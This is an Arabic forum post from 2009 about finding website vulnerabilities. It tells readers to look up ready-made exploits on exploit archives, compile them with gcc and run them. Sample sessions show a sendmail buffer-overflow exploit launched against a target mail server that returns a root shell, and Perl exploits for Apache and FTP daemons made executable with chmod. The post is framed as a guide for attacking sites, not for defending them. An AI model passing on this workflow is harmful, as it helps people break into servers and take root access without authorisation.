ali bedarnia
عدد الرسائل : 37 العمر : 32 مزاج : نقاط : 54074 0 ( mms ) : تاريخ التسجيل : 10/08/2009
| موضوع: كيف نبحث عن ثغرات ... الثلاثاء أغسطس 18, 2009 9:38 am | |
| كيف نبحث عن ثغرات ...
هذا الجزء أكبر من أن يوضع في كتاب ...... لذلك سوف أحاول أن أكتب هذا المقطع بالمختصر المفيد
هناك العديد من البرامج لمعرفة ثغرات الموقع ...
في الحقيقة برنامجي المفضل هو [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
إن لم تجد في الموقعين إبحث هنا [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
PHP - CGI - UNICODE - VB ... etc فاستغلالها يتم من المتصفح ...
إن وجدت سيكربتات مكتوبة بلغة السي لإستثمار ثغرة ما فاستخدامها كالتالي
أولا : قم بتحويلها إلى ملف تنفيذي بواسطة الأمر
gcc -o file file.c
gcc -o wuftpd-2.6.0 wuftpd-2.6.0.c
./wuftpd-2.6.0
$ gcc -o sendmail sendmail.c
$ ./sendmail
Usage : sendmail
$ ./sendmail smtp.targetdomain.com RedHat-6.2 anonymous anonymous
connecting to host...
connected...
id
uid=0(root) gid=0(root)
sendmail
بعد أن نفذنا هذا ... قام البرنامج بتنفيذ هجوم طفح الدارئ وأعطانا امتيازات root
./file.pl
Access Denied
chmod +x file.pl
هنا مثالين لملف قام بالعمل بشكل صحيح وآخر أظهر رسالة الخطأ المذكورة
$ ./apache.pl
Usage: apache
$ ./ftpd.pl
Access Denied.
$ chmod +x ftpd.pl
$ ./ftpd.pl
Usage:
host target host name
OS:
1 Linux Red Hat 6.2
2 OpenLinux 2.3
[so on]بإمكانك أيضا استخدام البرنامج Nessus من الموقع بعد العثور على ثغرة ما في موقع ... قم بالذهاب إلى أحد الموقعين التاليين للبحث عن ثغرات للبرنامج ... إذهب للموقع الثاني أولا فهو أصغر ... إن لم تجد إذهب للأول فهو الأفضل والأكبر ... لنترك البحث ونركز على الاستخدام ... إن كنت وجدت أحد هذه الثغرات مثلا وبعد أن يتم التحويل قم باستخدامها بالأمر وسوف تظهر لك طريقة الإستعمال ... مثلا لاحظ أن في هذه الثغرة طلب اسم ملقم البريد الذي يشغل برنامج ونظام التشغيل وكذلك اسم مستخدم وكلمة مرور ... قد تجد أحيانا سيكربت خاص بثغرة ما مكتوب بلغة Perl استخدامه كالآتي إن أعطاك الرسالة اكتب الأمر وقم بتشغيله مرة أخرى كما ترى قام بالعمل بشكل صحيح ... لنرى المثال الآخر | |
|